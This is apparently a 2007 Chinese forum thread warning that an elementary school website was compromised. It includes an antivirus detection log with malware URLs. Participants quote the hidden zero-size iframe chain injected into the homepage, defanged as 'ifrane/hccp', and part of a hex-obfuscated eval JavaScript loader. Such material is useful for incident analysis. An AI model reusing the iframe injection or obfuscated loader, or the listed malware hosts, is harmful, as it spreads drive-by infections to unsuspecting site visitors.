![]() |
||
Major Member
![]() 加入日期: Mar 2007
文章: 153
|
屏東縣瑞光國小.. 病毒警告
該學校網站好像中標了
剛剛小朋友點入.卡巴一直跳一直卡 真懷疑進入學校網站的小學生電腦會怎樣 ![]() www.rgps.ptc.edu.tw不要點 已偵測到:木馬程式 Trojan-Downloader.JS.Agent.wk 指令碼:http://www.rgps.ptc.edu.tw/[5] 已偵測到:惡意軟體 Exploit.Win32.RealPlr.o 網址:http://www.loveyoushipin.com/pic/web.htm 已偵測到:病毒 Worm.Win32.Downloader.cs 網址:http://www.loveyoushipin.com/pic.exe//PE_Patch//UPack 已刪除:病毒 Worm.Win32.Downloader.cs 檔案:C:\WINDOWS\rising306.exe//PE_Patch//UPack 已刪除:病毒 Worm.Win32.Downloader.cs 檔案:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\8LINODQB\pic[1].exe//PE_Patch//UPack 已偵測到:木馬程式 Trojan-Downloader.Win32.Agent.ggs 網址:http://sss.969222.com/bak.css//PE_Patch.UPX//UPX 已偵測到:木馬程式 Trojan-Downloader.VBS.Psyme.lh 網址:http://count23.51yes.ws/ying/Ms06014.htm 已偵測到:病毒 Worm.Win32.Downloader.cx 網址:http://web.wzxyq.com/mm/mm.exe//PE_Patch//UPack 已刪除:新的威脅 (修改) 檔案: 已刪除:病毒 Worm.Win32.Downloader.cx 檔案:c:\windows\microsoft.pif BAD_STATUS(5)病毒 Worm.Win32.Downloader.cx 檔案:c:\windows\microsoft.pif//PE_Patch 已刪除:病毒 Worm.Win32.Downloader.cs 檔案:C:\WINDOWS\rising197.exe 已刪除:病毒 Worm.Win32.Downloader.de 網址:http://down.llsging.com/bb/014.exe//PE_Patch//UPack 已刪除:病毒 Worm.Win32.Downloader.cs 檔案:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\49YB0LAV\pic[1].exe//PE_Patch//UPack 已刪除:病毒 Worm.Win32.Downloader.cs 檔案:C:\System Volume Information\_restore{6FCBD95C-429F-446E-9A8D-0D72669CD99D}\RP13\A0009896.exe//PE_Patch//UPack 已刪除:病毒 Worm.Win32.Downloader.cx 檔案:C:\System Volume Information\_restore{6FCBD95C-429F-446E-9A8D-0D72669CD99D}\RP13\A0010852.pif//PE_Patch//UPack 已刪除:病毒 Worm.Win32.Downloader.cs 檔案:C:\System Volume Information\_restore{6FCBD95C-429F-446E-9A8D-0D72669CD99D}\RP13\A0010856.exe//PE_Patch//UPack 未發現:病毒 Worm.Win32.Downloader.cx 檔案:C:\System Volume Information\_restore{6FCBD95C-429F-446E-9A8D-0D72669CD99D}\RP13\A0010874.pif//PE_Patch//UPack 未發現:病毒 Worm.Win32.Downloader.cs 檔案:C:\System Volume Information\_restore{6FCBD95C-429F-446E-9A8D-0D72669CD99D}\RP13\A0010875.exe//PE_Patch//UPack 此文章於 2007-12-23 01:22 PM 被 德州炸雞 編輯. |
|||||||
![]() |
![]() |
*停權中*
加入日期: Mar 2006 您的住址: 嘉義市全家便利商店
文章: 54
|
這種公家單位....而且又是稍微遠一點的學校
要是沒有什麼錢請外面代管網站 校務人員剛好又對電腦不太熟 自己架站的確很容易出包 |
||
![]() |
![]() |
*停權中*
加入日期: Dec 2006
文章: 367
|
點進去一點反應也沒有啊?
KIS 7.0 |
![]() |
![]() |
Golden Member
![]() ![]() ![]() ![]() 加入日期: Aug 2002
文章: 2,806
|
首頁被塞了這個
<ifrane src="hccp://w.aeaer.com/ae.htm" width=0 height=0></ifrane> PS: 為了怕有人誤點, iframe改成ifrane http改成hccp |
![]() |
![]() |
Golden Member
![]() ![]() ![]() ![]() 加入日期: Aug 2002
文章: 2,806
|
ae.htm裡面又有這些
<ifrane src="hccp://w.aeaer.com/in.htm" width=0 height=0></ifrane> <ifrane src="hccp://uu.uuzzvv.com/uu.htm" width=0 height=0></ifrane> <ifrane src="hccp://fu.55189.net/" width=0 height=0></ifrane> <ifrane src="hccp://an.sbb22.com/id.htm" width=0 height=0></ifrane> <ifrane src="hccp://wz.070808.net/37.htm" width=0 height=0></ifrane> 然後這些xx.htm裡面又有其他的iframe連到其他網站, 喵的一層套一層,還真妙! 此文章於 2007-12-23 01:58 PM 被 darksnow 編輯. |
![]() |
![]() |
*停權中*
加入日期: Dec 2006
文章: 367
|
彈跳網頁嗎....?
|
![]() |
![]() |
Golden Member
![]() ![]() ![]() ![]() 加入日期: Aug 2002
文章: 2,806
|
其中一個最後一層裡面是這個東西,
還有一個.js好像是解編碼用的 代碼:
<SCRIPT LANGUAGE='JavaScript'> function ResumeError() { return true; } window.onerror = ResumeError; </SCRIPT> <SCRIPT LANGUAGE="JavaScript"> eval("\x2f\x2a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55\x41\x47 \x45\x3d\x27\x4a\x61\x76\x61\x53\x63\x72\x69\x70\x74\x27\x3e\x20\x0d\x0a\x66 \x75\x6e\x63\x74\x69\x6f\x6e\x20\x52\x65\x73\x75\x6d\x65\x45\x72\x72\x6f\x72 \x28\x29\x20\x7b\x20\x0d\x0a\x72\x65\x74\x75\x72\x6e\x20\x74\x72\x75\x65\x3b \x20\x0d\x0a\x7d\x20\x0d\x0a\x77\x69\x6e\x64\x6f\x77\x2e\x6f\x6e\x65\x72\x72 \x6f\x72\x20\x3d\x20\x52\x65\x73\x75\x6d\x65\x45\x72\x72\x6f\x72\x3b\x20\x0d .................太多略 |
![]() |
![]() |
Power Member
![]() ![]() 加入日期: Dec 2006
文章: 627
|
![]() ![]() |
![]() |
![]() |
Master Member
![]() ![]() ![]() ![]() 加入日期: Mar 2006
文章: 1,772
|
那就麻煩樓主告知學校這件事吧
![]() |
![]() |
![]() |
Major Member
![]() 加入日期: Aug 2004
文章: 161
|
請樓主告知該校的資訊組長或教務處吧
|
![]() |
![]() |